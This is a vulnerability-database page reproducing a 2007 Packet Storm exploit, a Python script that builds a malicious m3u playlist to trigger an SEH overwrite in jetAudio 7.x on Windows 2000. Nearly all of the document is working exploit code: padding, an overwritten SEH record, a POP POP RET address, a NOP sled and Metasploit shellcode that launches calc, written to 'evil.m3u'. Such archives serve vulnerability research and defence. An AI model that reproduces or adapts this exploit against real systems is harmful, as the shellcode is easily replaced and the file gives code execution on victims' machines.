Lucene search

K

jetaudio-local.txt

🗓️ 15 Oct 2007 00:00:00Reported by Krystian KloskowskiType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 17 Views

jetAudio 7.x (m3u File) 0day Local SEH Overwrite Exploit by Krystian Kloskowski (h07) for jetAudio 7.0.3 Basic / 2k SP4 Polish, Shellcode for Windows Execute Command (calc) from metasploit.com

Show more

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`#!/usr/bin/python  
# jetAudio 7.x (m3u File) 0day Local SEH Overwrite Exploit  
# Bug discovered by Krystian Kloskowski (h07) <[email protected]>  
# Tested on: jetAudio 7.0.3 Basic / 2k SP4 Polish  
# Shellcode: Windows Execute Command (calc) <metasploit.com>  
# Just for fun ;)   
##  
  
from struct import pack  
  
m3u = ("#EXTM3U\nhttp://%s")  
  
shellcode = (  
"\x6a\x22\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x8d\x6c\xf6"  
"\xb2\x83\xeb\xfc\xe2\xf4\x71\x84\xb2\xb2\x8d\x6c\x7d\xf7\xb1\xe7"  
"\x8a\xb7\xf5\x6d\x19\x39\xc2\x74\x7d\xed\xad\x6d\x1d\xfb\x06\x58"  
"\x7d\xb3\x63\x5d\x36\x2b\x21\xe8\x36\xc6\x8a\xad\x3c\xbf\x8c\xae"  
"\x1d\x46\xb6\x38\xd2\xb6\xf8\x89\x7d\xed\xa9\x6d\x1d\xd4\x06\x60"  
"\xbd\x39\xd2\x70\xf7\x59\x06\x70\x7d\xb3\x66\xe5\xaa\x96\x89\xaf"  
"\xc7\x72\xe9\xe7\xb6\x82\x08\xac\x8e\xbe\x06\x2c\xfa\x39\xfd\x70"  
"\x5b\x39\xe5\x64\x1d\xbb\x06\xec\x46\xb2\x8d\x6c\x7d\xda\xb1\x33"  
"\xc7\x44\xed\x3a\x7f\x4a\x0e\xac\x8d\xe2\xe5\x9c\x7c\xb6\xd2\x04"  
"\x6e\x4c\x07\x62\xa1\x4d\x6a\x0f\x97\xde\xee\x6c\xf6\xb2")  
  
NEXT_SEH_RECORD = 0x909006EB # JMP SHORT + 0x06  
SE_HANDLER = 0x7CEA61F7 # POP POP RET (SHELL32.DLL / 2k SP4 Polish)  
  
buf = "CLICK ME"  
buf += "\x20" * 1009  
buf += pack("<L", NEXT_SEH_RECORD)  
buf += pack("<L", SE_HANDLER)  
buf += "\x90" * 128  
buf += shellcode  
  
m3u %= buf  
  
fd = open("evil.m3u", "w")  
fd.write(m3u)  
fd.close()  
  
print "DONE"  
  
# EoF  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo